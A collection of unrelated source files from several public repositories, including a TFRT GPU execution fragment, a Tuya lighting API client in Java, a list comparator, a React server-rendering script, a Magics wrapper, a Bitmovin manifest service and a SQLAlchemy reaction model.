auto current = wrapper::CtxSetCurrent(stream->context());
if (!current) return out_chain.SetError(current.takeError());
if (auto error = wrapper::MemcpyAsync(
*current,
wrapper::Pointer<void>(static_cast<void*>(dst.data()),
wrapper::Platform::CUDA),
src->pointer(), src->size(), stream->get()))
return out_chain.SetError(error);
// At this point, memcpy has been scheduled on the stream. However, the
// dst buffer is not ready yet. We need to insert a gpu event to notify
// the host when the memcpy is finished.
auto event =
wrapper::EventCreate(*current, wrapper::EventFlags::DISABLE_TIMING);
if (!event) return out_chain.SetError(event.takeError());
// Record the event on the stream.
if (auto error = wrapper::EventRecord(event->get(), stream->get()))
return out_chain.SetError(error);
// EventSynchronize needs to be scheduled in the blocking work queue
// because it will block caller thread until the event is completed.
auto enqueued = EnqueueBlockingWork(
exec_ctx,
[event = std::move(*event), out_chain = out_chain.CopyRef()] {
if (auto error = wrapper::EventSynchronize(event.get()))
return out_chain.SetError(error);
out_chain.emplace();
});
if (!enqueued) {
return out_chain.SetError(
"TransferFromDevice failed: failed to enqueue blocking work");
}
});
return out_chain;
}
AsyncValueRef<Chain> System::Execute(ExecutionContext& exec_ctx,
Program& program,
AsyncValueRef<GpuStream> stream,
ArrayRef<AsyncValueRef<GpuBuffer>> inputs,
ArrayRef<AsyncValueRef<GpuBuffer>> outputs,
AsyncValueRef<Chain> chain) {
const Function* fn = program.GetFunction();
if (fn->num_results() != 1) {
return MakeErrorAsyncValueRef(
"Failed to execute lowered function: expected one result");
}
auto num_args = fn->num_arguments();
// Lowering pass for HLO will generate BEF Function with the following
// signature: {chain, stream, ...inputs, ...outputs} -> chain
// So we need to prepare and check the arguments first.
SmallVector<AsyncValue*, 8> args;
args.reserve(num_args);
args.push_back(chain.GetAsyncValue());
args.push_back(stream.GetAsyncValue());
for (auto& input : inputs) {
args.push_back(input.GetAsyncValue());
}
for (auto& output : outputs) {
args.push_back(output.GetAsyncValue());
}
if (args.size() != num_args) {
return MakeErrorAsyncValueRef(
StrCat("Failed to execute lowered function: argument size mismatch: ",
args.size(), " v.s. ", num_args));
}
tfrt::RCReference<tfrt::AsyncValue> result;
fn->Execute(exec_ctx, args, {result});
return AsyncValueRef<Chain>(std::move(result));
}
} // namespace gpu
} // namespace tfrt
|
tuya/tuya-lighting-open-api-sdk-java
|
src/main/java/com/tuya/lighting/open/api/service/smart/linkage/LinkageApi.java
|
<gh_stars>0
package com.tuya.lighting.open.api.service.smart.linkage;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.TypeReference;
import com.tuya.lighting.open.api.config.OpenApiUrlConstants;
import com.tuya.lighting.open.api.domain.BaseResponse;
import com.tuya.lighting.open.api.domain.smart.linkage.*;
import com.tuya.lighting.open.api.utils.HttpClientUtils;
import java.util.List;
/**
* LinkageApi
*
* @author lighting
*/
public class LinkageApi {
/**
* Querying linkage list.
*
* @param request request
* @return linkage list
*/
public BaseResponse<List<LinkageInfoResult>> listLinkages(LinkageListRequest request) {
String json = HttpClientUtils.doGetWithBody(OpenApiUrlConstants.LINKAGE_LIST_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<List<LinkageInfoResult>> res = JSON.parseObject(json, new TypeReference<BaseResponse<List<LinkageInfoResult>>>() {
});
return res;
}
/**
* Getting linkage detail.
*
* @param ruleId ruleId
* @return linkage info
*/
public BaseResponse<LinkageInfoResult> getLinkageById(String ruleId) {
String json = HttpClientUtils.doGet(String.format(OpenApiUrlConstants.GET_LINKAGE_BY_ID_URL_SUFFIX, ruleId), null);
BaseResponse<LinkageInfoResult> res = JSON.parseObject(json, new TypeReference<BaseResponse<LinkageInfoResult>>() {
});
return res;
}
/**
* Creating a linkage
*
* @param request request
* @return linkage info
*/
public BaseResponse<LinkageInfoResult> createLinkage(LinkageSaveRequest request) {
String json = HttpClientUtils.doPost(OpenApiUrlConstants.CREATE_LINKAGE_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<LinkageInfoResult> res = JSON.parseObject(json, new TypeReference<BaseResponse<LinkageInfoResult>>() {
});
return res;
}
/**
* Updating a linkage.
*
* @param request request
* @return linkage info
*/
public BaseResponse<LinkageInfoResult> updateLinkage(LinkageSaveRequest request) {
String json = HttpClientUtils.doPost(OpenApiUrlConstants.UPDATE_LINKAGE_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<LinkageInfoResult> res = JSON.parseObject(json, new TypeReference<BaseResponse<LinkageInfoResult>>() {
});
return res;
}
/**
* Querying schedule list.
*
* @param request request
* @return schedule list
*/
public BaseResponse<List<LinkageInfoResult>> listSchedules(LinkageListRequest request) {
String json = HttpClientUtils.doGetWithBody(OpenApiUrlConstants.SCHEDULE_LIST_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<List<LinkageInfoResult>> res = JSON.parseObject(json, new TypeReference<BaseResponse<List<LinkageInfoResult>>>() {
});
return res;
}
/**
* Getting schedule detail.
*
* @param ruleId ruleId
* @return schedule info
*/
public BaseResponse<LinkageInfoResult> getScheduleById(String ruleId) {
String json = HttpClientUtils.doGet(String.format(OpenApiUrlConstants.GET_SCHEDULE_BY_ID_URL_SUFFIX, ruleId), null);
BaseResponse<LinkageInfoResult> res = JSON.parseObject(json, new TypeReference<BaseResponse<LinkageInfoResult>>() {
});
return res;
}
/**
* Creating a schedule.
*
* @param request request
* @return schedule info
*/
public BaseResponse<LinkageInfoResult> createSchedule(LinkageSaveRequest request) {
String json = HttpClientUtils.doPost(OpenApiUrlConstants.CREATE_SCHEDULE_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<LinkageInfoResult> res = JSON.parseObject(json, new TypeReference<BaseResponse<LinkageInfoResult>>() {
});
return res;
}
/**
* Updating a schedule.
*
* @param request request
* @return schedule info
*/
public BaseResponse<LinkageInfoResult> updateSchedule(LinkageSaveRequest request) {
String json = HttpClientUtils.doPost(OpenApiUrlConstants.UPDATE_SCHEDULE_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<LinkageInfoResult> res = JSON.parseObject(json, new TypeReference<BaseResponse<LinkageInfoResult>>() {
});
return res;
}
/**
* Changing status of a smart-rule(including linkage and schedule).
*
* @param request request
* @return result
*/
public BaseResponse<Object> changeStatus(ChangeStatusRequest request) {
String json = HttpClientUtils.doPost(OpenApiUrlConstants.SMART_CHANGE_STATUS_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<Object> res = JSON.parseObject(json, new TypeReference<BaseResponse<Object>>() {
});
return res;
}
/**
* Deleting a smart rule.
*
* @param request request
* @return result
*/
public BaseResponse<Object> deleteLinkage(LinkageDeleteRequest request) {
String json = HttpClientUtils.doPost(OpenApiUrlConstants.SMART_REMOVE_URL_SUFFIX, JSONObject.toJSONString(request));
BaseResponse<Object> res = JSON.parseObject(json, new TypeReference<BaseResponse<Object>>() {
});
return res;
}
}
|
YuryMatskevich/ymatskevich
|
chapter_003/src/main/java/ru/job4j/comparator/ListCompare.java
|
<gh_stars>0
package ru.job4j.comparator;
import java.util.Comparator;
import java.util.List;
/**
* @author <NAME>
* @since 0.1
*/
public class ListCompare implements Comparator<List<Integer>> {
@Override
public int compare(List<Integer> left, List<Integer> right) {
int result = 0;
if (left.size() != right.size()) {
result = left.size() < right.size() ? -1 : -2;
} else {
for (int i = 0; i < left.size(); i++) {
int com = left.get(i).compareTo(right.get(i));
if (com != 0) {
result = com > 0 ? 1 : 2;
} else {
result = 0;
}
}
}
return result;
}
}
|
undvl/qbproj
|
server/srv_render.old.js
|
import React from 'react';
// import { createStore } from 'redux';
import configureStore from '../app/store/configureStore';
import { Provider } from 'react-redux';
import rootReducer from '../app/reducers';
import Root from '../app/containers/Root';
import { renderToString } from 'react-dom/server';
import { match, RouterContext } from 'react-router';
import routes from '../app/containers/routes_prm';
import DevTools from '../app/containers/DevTools';
import { processThemesListReq } from '../app/actions/portal';
function handleRender(req, res) {
// Create a new Redux store instance
// const store = createStore(rootReducer)
const store = configureStore();
// store.dispatch(processThemesListReq('qb2'));
setTimeout(() => {
// Grab the initial state from our Redux store
let preloadedState = store.getState();
// console.log(preloadedState);
match({ routes, location: req.url }, (error, redirectLocation, renderProps) => {
if (error) {
res.status(500).send(error.message)
} else if (redirectLocation) {
res.redirect(302, redirectLocation.pathname + redirectLocation.search)
} else if (renderProps) {
// You can also check renderProps.components or renderProps.routes for
// your "not found" component or route respectively, and send a 404 as
// below, if you're using a catch-all route.
let html;
if( !(process.env.NODE_ENV=='production') ){
html = renderToString(
<Provider store={store}>
<div>
<RouterContext {...renderProps} />
<DevTools />
</div>
</Provider>
);
} else {
html = renderToString(
<Provider store={store}>
<div>
<RouterContext {...renderProps} />
</div>
</Provider>
);
}
res.status(200).send(renderFullPage(html, preloadedState));
} else {
res.status(404).send('Not found');
}
})
}, 1000);
}
function renderFullPage(html, preloadedState) {
const Handlebars = require('handlebars');
const fs = require('fs');
let fileData = fs.readFileSync(__dirname + '/../public/assets/main.html').toString();
let layoutTemplate = Handlebars.compile(fileData);
let renderedLayout = layoutTemplate({
content: `<div id="root"><div>${html}</div></div>`,
script: `<script>window.__PRELOADED_STATE__ = ${JSON.stringify(preloadedState)}</script>`
});
// console.log(renderedLayout)
return renderedLayout;
// return `
// <!doctype html>
// <html>
// <head>
// <title>Redux Universal Example</title>
// <link href="/assets/style.css" rel="stylesheet">
// </head>
// <body>
// <div id="root"><div>${html}</div></div>
// <script>
// window.__PRELOADED_STATE__ = ${JSON.stringify(preloadedState)}
// </script>
// <script src="/assets/bundle.js"></script>
// </body>
// </html>
// `
}
module.exports = handleRender;
//export default handleRender;
|
b8raoult/magics
|
src/attributes/LevelListSelectionTypeWrapper.cc
|
/****************************** LICENSE *******************************
* (C) Copyright 1996-2017 ECMWF.
*
* This software is licensed under the terms of the Apache Licence Version 2.0
* which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
* In applying this licence, ECMWF does not waive the privileges and immunities
* granted to it by virtue of its status as an intergovernmental organisation nor
* does it submit to any jurisdiction.
******************************* LICENSE *******************************/
/*! \\file LevelListSelectionTypeAttributes.h
\\brief Definition of LevelListSelectionType Attributes class.
This file is automatically generated.
Do Not Edit!
*/
#include "MagRequest.h"
#include "LevelListSelectionTypeWrapper.h"
#include "MagicsParameter.h"
#include "Factory.h"
#include "MagTranslator.h"
#include "MagicsGlobal.h"
using namespace magics;
LevelListSelectionTypeWrapper::LevelListSelectionTypeWrapper(): levellistselectiontype_(new LevelListSelectionType())
{
LevelSelectionWrapper::object(levellistselectiontype_);
}
LevelListSelectionTypeWrapper::LevelListSelectionTypeWrapper(LevelListSelectionType* levellistselectiontype): levellistselectiontype_(levellistselectiontype)
{
LevelSelectionWrapper::object(levellistselectiontype_);
}
LevelListSelectionTypeWrapper::~LevelListSelectionTypeWrapper()
{
}
void LevelListSelectionTypeWrapper::set(const MagRequest& request)
{
LevelSelectionWrapper::set(request);
doublearray list_value;
for (int i = 0; i < request.countValues("CONTOUR_LEVEL_LIST"); i++)
list_value.push_back((double)request("CONTOUR_LEVEL_LIST", i));
if ( !list_value.empty() )
levellistselectiontype_->list_ = list_value;
}
void LevelListSelectionTypeWrapper::print(ostream& out) const
{
out << "LevelListSelectionTypeWrapper[]";
}
|
koraygulcu/bitmovin-python
|
bitmovin/services/manifests/manifest_service.py
|
from bitmovin.bitmovin_object import BitmovinObject
from .dash_manifest_service import DASH
from .hls_manifest_service import HLS
class ManifestService(BitmovinObject):
def __init__(self, http_client):
super().__init__()
self.http_client = http_client
self.DASH = DASH(http_client=self.http_client)
self.HLS = HLS(http_client=self.http_client)
|
NiHighlism/Minerva
|
app/main/models/reactions.py
|
<reponame>NiHighlism/Minerva<filename>app/main/models/reactions.py
"""
DB Model for Likes and
relevant junction tables
"""
import datetime
from sqlalchemy.sql import and_, select
from app.main import db, login_manager
class Reaction(db.Model):
"""
Description of User model.
Columns
-----------
:id: int [pk]
:value: int [pk]
:user_id: int [Foreign Key -> User.id]
:post_id: int [Foreign Key -> Post.id]
:comment_id: int [Foreign Key -> Comment.id]
:creation_time: DateTime [not NULL]
"""
# Columns
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.Integer)
user_id = db.Column(db.Integer, db.ForeignKey("user.id"))
base_id = db.Column(db.Integer, db.ForeignKey("base.id"))
creation_time = db.Column(db.DateTime, default=datetime.datetime.now())
def __init__(self, value, user_id, post_id):
self.value = value
self.user_id = user_id
self.post_id = post_id
def update_col(self, key, value):
setattr(self, key, value)
db.session.commit()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.